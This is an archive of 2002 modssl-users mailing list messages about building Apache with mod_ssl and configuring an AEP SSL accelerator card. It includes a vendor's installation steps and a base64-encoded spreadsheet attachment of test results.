> SSL_BASE=SYSTEM thing.
>
> I have openssl installed, this is redhat, but when I set SSL_BASE=SYSTEM,
> I still get the error:
>
> Error: Cannot find SSL binaries under /usr/local/ssl
>
> when I run configure in apache.  I don't know what binaries it's looking
> for, but there is a bin directory under /usr/local/ssl.
>
> -Ernst
>
> On Mon, 8 Jul 2002, [iso-8859-2] Jan ?kola wrote:
>
> > Yes, use this script to compile Apache & mod_ssl & mod_perl & php. If
> > you dont want it all comment it. I use this with complete success on RH
> > 7.2, after unzip, config and make go to apache* dir and run make install
> >
> > Jan Skola
> >
> > > -----Original Message-----
> > > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]
> > > On Behalf Of New Disorder Records
> > > Sent: Monday, July 08, 2002 5:13 PM
> > > To: modssl-users@modssl.org
> > > Subject: apache_1.3.26
> > >
> > > is anyone else having problems compiling apache_1.3.26 with mod_ssl?
> > I'm
> > > on a redhat 7.2 box, and mod_ssl just erases my src/makefile in the
> > apache
> > > directory.  Not erases, but all that's created is a blank header.
> > After I
> > > try, I have to wipe the directory and untar apache again so that I can
> > > compile it without mod_ssl.  Any suggestions?
> > >
> > >
> > >
> > > --
> > > New Disorder Records "you've heard of us now, so shut up and buy the
> > damn
> > > Sacrilicious CD" - www.newdisorder.com
> > > Pirx the Pilot: One of the top three Structuralist punk rock bands in
> > the
> > > country.  www.pirxthepilot.com
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> >
>
> --
> New Disorder Records "you've heard of us now, so shut up and buy the damn
> Sacrilicious CD" - www.newdisorder.com
> Pirx the Pilot: One of the top three Structuralist punk rock bands in the
> country.  www.pirxthepilot.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

--
Glen S Mehn
Contract Systems Administrator		SquareTrade, Inc
glen@squaretrade.com	Building Trust in Transactions (sm)
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:09:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19892; Wed, 10 Jul 2002 09:08:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA19542; Wed, 10 Jul 2002 09:07:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 909674CE744; Wed, 10 Jul 2002 09:07:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2CDA128836; Wed, 10 Jul 2002 08:49:04 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Aep-Mail.aep-net.com id TAA22106; Tue, 9 Jul 2002 19:33:16 +0200 (MET DST)
Received: from Aep-Mail.aep-net.com (unverified) by Aep-Mail.aep-net.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Tue, 9 Jul 2002 16:16:51 +0100
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2275B.A6D7CF6F"
Subject: RE: freebsd SSLCryptoDevice
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Date: Tue, 9 Jul 2002 16:16:51 +0100
Message-ID: <9CC75308C175544A96639D81CF07B12305677F@Aep-Mail.aep-net.com>
Thread-Topic: freebsd SSLCryptoDevice
Thread-Index: AcInUyTUO0mHxdHPQoaZ3umA+G+TWQACCVRA
From: "Noel O'Kelly" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Noel O'Kelly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2275B.A6D7CF6F
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Rob,

I will send you offline instructions for installing our card on Apache
2.0.39. If anyone else has similiar problems contact me directly

regards,

Noel O'Kelly
Product support engineer
Aep ltd.

-----Original Message-----
From: Robert McMonigal [mailto:robert_mcmonigal@hotmail.com]
Sent: 08 July 2002 20:39
To: modssl-users@modssl.org
Subject: freebsd SSLCryptoDevice


I have been trying to get an aep hardware acclerator to work under
apache=20
2.0.39.  Everything installs fine and it runs fine with SSLCryptoDevice=20
builtin.  But if I change builtin to aep and try to start it, it appears
to=20
start mormally (no error messages from the console) but in the error log
I=20
get "Init: Failed to enable Crypto Device API `aep'" I know the card is=20
working because I can do openssl speed rsa1024 -engine aep and the CPU
time=20
is less then a second for ten seconds of computations.  I have tried
this on=20
redhat 7.3 and it works.  So I was wondering if apache 2 compiles=20
differently on freebsd then redhat.  Any ideas on what is going wrong
would=20
be greatly appreciated.


I run the following command for the configure

CFLAGS=3D"-DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure=20
--prefix=3D/usr/local/httpd --enable-ssl=20
--with-ssl=3D/usr/local/src/openssl-engine-0.9.6d

Thanks,

Rob

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:=20
http://photos.msn.com/support/worldwide.aspx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C2275B.A6D7CF6F
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






RE: freebsd SSLCryptoDevice





Rob,




I will send you offline instructions for installing =
our card on Apache 2.0.39. If anyone else has similiar problems contact =
me directly



regards,




Noel O'Kelly


Product support engineer


Aep ltd.




-----Original Message-----


From: Robert McMonigal [mailto:robert_mcmonigal@hotm=
ail.com]


Sent: 08 July 2002 20:39


To: modssl-users@modssl.org


Subject: freebsd SSLCryptoDevice






I have been trying to get an aep hardware acclerator =
to work under apache 


2.0.39.  Everything installs fine and it runs =
fine with SSLCryptoDevice 


builtin.  But if I change builtin to aep and try =
to start it, it appears to 


start mormally (no error messages from the console) =
but in the error log I 


get "Init: Failed to enable Crypto Device API =
`aep'" I know the card is 


working because I can do openssl speed rsa1024 =
-engine aep and the CPU time 


is less then a second for ten seconds of =
computations.  I have tried this on 


redhat 7.3 and it works.  So I was wondering if =
apache 2 compiles 


differently on freebsd then redhat.  Any ideas =
on what is going wrong would 


be greatly appreciated.






I run the following command for the configure




CFLAGS=3D"-DSSL_EXPERIMENTAL -DSSL_ENGINE" =
./configure 


--prefix=3D/usr/local/httpd --enable-ssl 


--with-ssl=3D/usr/local/src/openssl-engine-0.9.6d




Thanks,




Rob




________________________________________________________________=
_


MSN Photos is the easiest way to share and print your =
photos: 


http://photos.msn.c=
om/support/worldwide.aspx


________________________________________________________________=
______


Apache Interface to OpenSSL =
(mod_ssl)          &nbs=
p;        www.modssl.org


User Support Mailing =
List           &nb=
sp;          =
modssl-users@modssl.org


Automated List =
Manager           =
            &=
nbsp;    majordomo@modssl.org





------_=_NextPart_001_01C2275B.A6D7CF6F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 10 09:09:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA19922; Wed, 10 Jul 2002 09:08:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA19543; Wed, 10 Jul 2002 09:07:07 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A84294CE747; Wed, 10 Jul 2002 09:07:06 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 314802883C; Wed, 10 Jul 2002 08:49:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from Aep-Mail.aep-net.com id TAA22109; Tue, 9 Jul 2002 19:33:18 +0200 (MET DST)
Received: from Aep-Mail.aep-net.com (unverified) by Aep-Mail.aep-net.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Tue, 9 Jul 2002 16:25:38 +0100
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C2275C.E0BF4E82"
Subject: RE: freebsd SSLCryptoDevice
X-MimeOLE: Produced By Microsoft Exchange V6.0.4417.0
Date: Tue, 9 Jul 2002 16:25:38 +0100
Message-ID: <9CC75308C175544A96639D81CF07B123056780@Aep-Mail.aep-net.com>
Thread-Topic: freebsd SSLCryptoDevice
Thread-Index: AcInUyTUO0mHxdHPQoaZ3umA+G+TWQACQrsQ
From: "Noel O'Kelly" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Noel O'Kelly" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C2275C.E0BF4E82
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_002_01C2275C.E0BF4E82"


------_=_NextPart_002_01C2275C.E0BF4E82
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable

Hi Rob,
Michelle Comyns recently tested our card using Apache 2.0 and
subsequently sent the attached to another customer. The tests were on
Linux rather that Freebsd but should be of assistance. Try these out and
let me know how you get on.

Regards,
Noel O'Kelly




Attached are the results of our Apache 2.0 testing.=20
These were carried out using Apache 2.0.36/ Red Hat Linux 7.2 on a Dual
1.26Ghz server with an AEP2000L card.

There are a few differences in the installation for Apache 2.0.
There is no longer a need to install mod_ssl as a seperate package
(features have been integrated into Apache)

The installation process is a s follows:

>From the directory where you unzipped the tar file -
CFLAGS=3D"DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure --enable-ssl
--with-ssl=3D/usr/local --enable-shared-mods=3D"ssl"
make=20
make install

This will install Apache 2.0 to /usr/local/apache2/  =20
This assumes that you have an AEP aware OpenSSL installed to /usr/local
(I used OpenSSL-engine-0.9.6d)

The line 'SSLCryptoDevice aep' should be added to the file
/usr/local/apache2/conf/ssl.conf
(All of the SSL configuration options have been taken from the http.conf
and are now in a new ssl.conf file)

Note: There is no longer an option to create a test certificate in
Apache 2.0 so you will need to copy a test certificate from
an older version of Apache in order to test the installation.

The performance tuning is similar to previous versions of Apache.

Apologies for the delay in sending these figures. If you have any
further questions don't hesitate to contact me.

regards,

Michelle Comyns
Product Support Engineer
AEP Systems,
Bray Business Park,
Southern Cross Route,
Bray,
Co. Wicklow.

-----Original Message-----
From: Robert McMonigal [mailto:robert_mcmonigal@hotmail.com]
Sent: 08 July 2002 20:39
To: modssl-users@modssl.org
Subject: freebsd SSLCryptoDevice


I have been trying to get an aep hardware acclerator to work under
apache=20
2.0.39.  Everything installs fine and it runs fine with SSLCryptoDevice=20
builtin.  But if I change builtin to aep and try to start it, it appears
to=20
start mormally (no error messages from the console) but in the error log
I=20
get "Init: Failed to enable Crypto Device API `aep'" I know the card is=20
working because I can do openssl speed rsa1024 -engine aep and the CPU
time=20
is less then a second for ten seconds of computations.  I have tried
this on=20
redhat 7.3 and it works.  So I was wondering if apache 2 compiles=20
differently on freebsd then redhat.  Any ideas on what is going wrong
would=20
be greatly appreciated.


I run the following command for the configure

CFLAGS=3D"-DSSL_EXPERIMENTAL -DSSL_ENGINE" ./configure=20
--prefix=3D/usr/local/httpd --enable-ssl=20
--with-ssl=3D/usr/local/src/openssl-engine-0.9.6d

Thanks,

Rob

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos:=20
http://photos.msn.com/support/worldwide.aspx
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_002_01C2275C.E0BF4E82
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable






RE: freebsd SSLCryptoDevice





Hi Rob,


Michelle Comyns recently tested our card using Apache =
2.0 and subsequently sent the attached to another customer. The tests =
were on Linux rather that Freebsd but should be of assistance. Try these =
out and let me know how you get on.



Regards,


Noel O'Kelly










Attached are the results of our Apache 2.0 testing. =



These were carried out using Apache 2.0.36/ Red Hat =
Linux 7.2 on a Dual 1.26Ghz server with an AEP2000L card.




There are a few differences in the installation for =
Apache 2.0.


There is no longer a need to install mod_ssl as a =
seperate package (features have been integrated into Apache)




The installation process is a s follows:




From the directory where you unzipped the tar file =
-


CFLAGS=3D"DSSL_EXPERIMENTAL -DSSL_ENGINE" =
./configure --enable-ssl --with-ssl=3D/usr/local =
--enable-shared-mods=3D"ssl"


make 


make install




This will install Apache 2.0 to =
/usr/local/apache2/   


This assumes that you have an AEP aware OpenSSL =
installed to /usr/local (I used OpenSSL-engine-0.9.6d)




The line 'SSLCryptoDevice aep' should be added to the =
file /usr/local/apache2/conf/ssl.conf


(All of the SSL configuration options have been taken =
from the http.conf and are now in a new ssl.conf file)




Note: There is no longer an option to create a test =
certificate in Apache 2.0 so you will need to copy a test certificate =
from



an older version of Apache in order to test the =
installation.




The performance tuning is similar to previous versions =
of Apache.




Apologies for the delay in sending these figures. If =
you have any further questions don't hesitate to contact me.




regards,




Michelle Comyns


Product Support Engineer


AEP Systems,


Bray Business Park,


Southern Cross Route,


Bray,


Co. Wicklow.




-----Original Message-----


From: Robert McMonigal [mailto:robert_mcmonigal@hotm=
ail.com]


Sent: 08 July 2002 20:39


To: modssl-users@modssl.org


Subject: freebsd SSLCryptoDevice






I have been trying to get an aep hardware acclerator =
to work under apache 


2.0.39.  Everything installs fine and it runs =
fine with SSLCryptoDevice 


builtin.  But if I change builtin to aep and try =
to start it, it appears to 


start mormally (no error messages from the console) =
but in the error log I 


get "Init: Failed to enable Crypto Device API =
`aep'" I know the card is 


working because I can do openssl speed rsa1024 =
-engine aep and the CPU time 


is less then a second for ten seconds of =
computations.  I have tried this on 


redhat 7.3 and it works.  So I was wondering if =
apache 2 compiles 


differently on freebsd then redhat.  Any ideas =
on what is going wrong would 


be greatly appreciated.






I run the following command for the configure




CFLAGS=3D"-DSSL_EXPERIMENTAL -DSSL_ENGINE" =
./configure 


--prefix=3D/usr/local/httpd --enable-ssl 


--with-ssl=3D/usr/local/src/openssl-engine-0.9.6d




Thanks,




Rob




________________________________________________________________=
_


MSN Photos is the easiest way to share and print your =
photos: 


http://photos.msn.c=
om/support/worldwide.aspx


________________________________________________________________=
______


Apache Interface to OpenSSL =
(mod_ssl)          &nbs=
p;        www.modssl.org


User Support Mailing =
List           &nb=
sp;          =
modssl-users@modssl.org


Automated List =
Manager           =
            &=
nbsp;    majordomo@modssl.org





------_=_NextPart_002_01C2275C.E0BF4E82--

------_=_NextPart_001_01C2275C.E0BF4E82
Content-Type: application/vnd.ms-excel;
	name="LinuxApache2.0.xls"
Content-Transfer-Encoding: base64
Content-Description: LinuxApache2.0.xls
Content-Disposition: attachment;
	filename="LinuxApache2.0.xls"

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAHAAAAAAAAAAA
EAAA/v///wAAAAD+////AAAAABsAAAD/////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////8J
CBAAAAYFAP4czQfJQAAABgEAAOEAAgCwBMEAAgAAAOIAAABcAHAABAAAVXNlciAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEIAAgCwBGEBAgAAAMABAAA9AQYA
AQACAAMAnAACAA4AGQACAAAAEgACAAAAEwACAAAArwECAAAAvAECAAAAPQASAHgAPABMO4EkOAAA
AAAAAQBYAkAAAgAAAI0AAgAAACIAAgAAAA4AAgABALcBAgAAANoAAgAAADEAGgDIAAAA/3+QAQAA
AAAAAAUBQQByAGkAYQBsADEAGgDIAAAA/3+QAQAAAAAAAAUBQQByAGkAYQBsADEAGgDIAAAA/3+Q
AQAAAAAAAAUBQQByAGkAYQBsADEAGgDIAAAA/3+QAQAAAAAAAAUBQQByAGkAYQBsADEAGgDIAAEA
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
AAAAAAAAAERJTlUiAAAAMAIAAOpxV0kAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQAAAAEA
AAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoQAi
AAEAZAABAAEAAQACAFgCWAIAAAAAAADgPwAAAAAAAOA/AQBVAAIACAB9AAwAAAAAALYVDwACAAIA
fQAMAAEAAQDbDA8AAgACAH0ADAACAAIAJAsPAAIAAgB9AAwAAwADALYLDwACAAIAfQAMAAQABACS
EA8AAgACAAACDgABAAAAHAAAAAAABgAAAAgCEAABAAAABgD/AAAAAAAAAQ8ACAIQAAIAAAAGAP8A
AAAAAAABDwAIAhAAAwAAAAYA/wAAAAAAAAEPAAgCEAAEAAAABgD/AAAAAAAAAQ8ACAIQAAUAAAAG
AP8AAAAAAAABDwAIAhAABgAAAAYA/wAAAAAAAAEPAAgCEAAHAAAABgD/AAAAAAAAAQ8ACAIQAAgA
AAAGAP8AAAAAAAABDwAIAhAACQAAAAYA/wAAAAAAAAEPAAgCEAAKAAAABgD/AAAAAAAAAQ8ACAIQ
AAsAAAAGAP8AAAAAAAABDwAIAhAADAAAAAYA/wAAAAAAAAEPAAgCEAANAAAABgD/AAAAAAAAAQ8A
CAIQAA4AAAAGAP8AAAAAAAABDwAIAhAADwAAAAYA/wAAAAAAAAEPAAgCEAAQAAAABQD/AAAAAAAA
AQ8ACAIQABEAAAAFAP8AAAAAAAABDwAIAhAAEgAAAAUA/wAAAAAAAAEPAAgCEAATAAAABQD/AAAA
AAAAAQ8ACAIQABQAAAAFAP8AAAAAAAABDwAIAhAAFQAAAAUA/wAAAAAAAAEPAAgCEAAWAAAABQD/
AAAAAAAAAQ8ACAIQABcAAAAFAP8AAAAAAAABDwAIAhAAGAAAAAUA/wAAAAAAAAEPAAgCEAAZAAAA
BQD/AAAAAAAAAQ8ACAIQABoAAAAFAP8AAAAAAAABDwAIAhAAGwAAAAUA/wAAAAAAAAEPAP0ACgAB
AAAADwAHAAAA/QAKAAEAAgAPAAkAAAD9AAoAAgAAAA8ACgAAAP0ACgACAAIADwAGAAAA/QAKAAMA
AAAPAAgAAAABAgYABAAAABYA/QAKAAQAAQAWAAIAAAD9AAoABAACABYAAwAAAP0ACgAEAAMAFgAE
AAAA/QAKAAQABAAWAAUAAAABAgYABAAFABUA/QAKAAUAAAAXAAAAAAC9AB4ABQABABoAAAAAQBoA
AIBYQBsAAQAcQBoAAQAAQAQAAQIGAAUABQAVAAECBgAGAAAAFgC9AB4ABgABABoAAAAQQBoAACBj
QBsAAQAkQBoAAQAEQAQAAQIGAAYABQAVAAECBgAHAAAAFgC9ABgABwABABoAAAAYQBoAAEB1QBsA
AQA0QAMAAwIOAAcABAAaAJzEILByaJE/AQIGAAcABQAVAAECBgAIAAAAFgC9AB4ACAABABoAAAAg
QBoAAJB4QBsAAQA+QBoAAQAAQAQAAQIGAAgABQAVAAECBgAJAAAAFwC9ABgACQABABgAAAAkQBgA
ANCBQBkAAQBEQAMAAwIOAAkABAAYAJzEILByaJE/AQIGAAoAAAAXAL0AGAAKAAEAGAAAADRAGAAA
0ItAGQABAE5AAwADAg4ACgAEABgAGy/dJAaBlT8BAgYACwAAABcAvQAYAAsAAQAYAAAAREAYAAAQ
jUAZAAGAUUADAAMCDgALAAQAGAA5tMh2vp+aPwECBgAMAAAAFwC9ABgADAABABgAAABOQBgAACiN
QBkAAQBUQAMAAwIOAAwABAAYAHnpJjEIrJw/AQIGAA0AAAAXAL0AHgANAAEAGAAAAFRAGAAAMI1A
GQAAAPA/GAABAAhABAABAgYADgAAABcAvQAYAA4AAQAYAAAAWUAYAAAojUAZAAAA8D8DAAMCDgAO
AAQAGACcxCCwcmihP74AEAAPAAAAFwAYABgAGQAYAAQAvgAQABAAAAAXABgAGAAZABgABAD9AAoA
EQAAABcAAQAAAL0AHgARAAEAGAAAAABAGAAAgFNAGQABAD5AGAABAARABAABAgYAEgAAABcAvQAY
ABIAAQAYAAAAEEAYAACAYUAZAAGARkADAAMCDgASAAQAGADZzvdT46WbPwECBgATAAAAFwC9AB4A
EwABABgAAAAYQBgAAABpQBkAAYBWQBgAAQAIQAQAAQIGABQAAAAXAL0AHgAUAAEAGAAAACBAGAAA
QGVAGQAAAPA/GAABABJABAABAgYAFQAAABcAvQAYABUAAQAYAAAAJEAYAAAgYkAZAAAA8D8DAAMC
DgAVAAQAGACcxCCwcmixPwECBgAWAAAAFwC9AB4AFgABABgAAAA0QBgAAEBhQBkAAADwPxgAAQAt
QAQAAQIGABcAAAAXAL0AGAAXAAEAGAAAAERAGAAA4GBAGQAAAPA/AwADAg4AFwAEABgAN4lBYOXQ
0j8BAgYAGAAAABcAvQAeABgAAQAYAAAATkAYAABAYEAZAAAA8D8YAAHARkAEAAECBgAZAAAAFwC9
AB4AGQABABgAAABUQBgAAABfQBkAAADwPxgAAUBQQAQAAQIGABoAAAAXAL0AHgAaAAEAGAAAAFlA
GAAAgF5AGQAAAPA/GAABAFRABAC+ABAAGwAAABcAGAAYABgAGAAEANcAOgD2BgAACAIcABwADgBM
ADoANgBCADYAOAA4ADgAOAAsADgAFAAUADAAOAAsACwAOAAsADgALAAsACwAPgISALYGAAAAAEAA
AAAAAAAAAAAAAB0ADwADBAAFAAAAAQAEAAQABQXvAAYAAAA3AAAACgAAAAkIEAAABhAA/hzNB8lA
AAAGAQAACwIQAAAAAAAAAAAAAAAAAJgTAAANAAIAAQAMAAIAZAAPAAIAAQARAAIAAAAQAAgA/Knx
0k1iUD9fAAIAAQAqAAIAAAArAAIAAACCAAIAAQCAAAgAAAAAAAAAAAAlAgQAAAD/AIEAAgDBBBQA
AAAVAAAAgwACAAAAhAACAAAAoQAiAAAA/wABAAEAAQAEAAAFBQUAAAAAAADgPwAAAAAAAOA/DQBV
AAIACAAAAg4AAAAAAAAAAAAAAAAAAAA+AhIAtgAAAAAAQAAAAAAAAAAAAAAAHQAPAAMAAAAAAAAB
AAAAAAAAAO8ABgAAADcAAAAKAAAACQgQAAAGEAD+HM0HyUAAAAYBAAALAhAAAAAAAAAAAAAAAAAA
nxQAAA0AAgABAAwAAgBkAA8AAgABABEAAgAAABAACAD8qfHSTWJQP18AAgABACoAAgAAACsAAgAA
AIIAAgABAIAACAAAAAAAAAAAACUCBAAAAP8AgQACAMEEFAAAABUAAACDAAIAAACEAAIAAAChACIA
AAD/AAEAAQABAAQAAAAAAAAAAAAAAOA/AAAAAAAA4D8NAFUAAgAIAAACDgAAAAAAAAAAAAAAAAAA
AD4CEgC2AAAAAABAAAAAAAAAAAAAAAAdAA8AAwAAAAAAAAEAAAAAAAAA7wAGAAAANwAAAAoAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
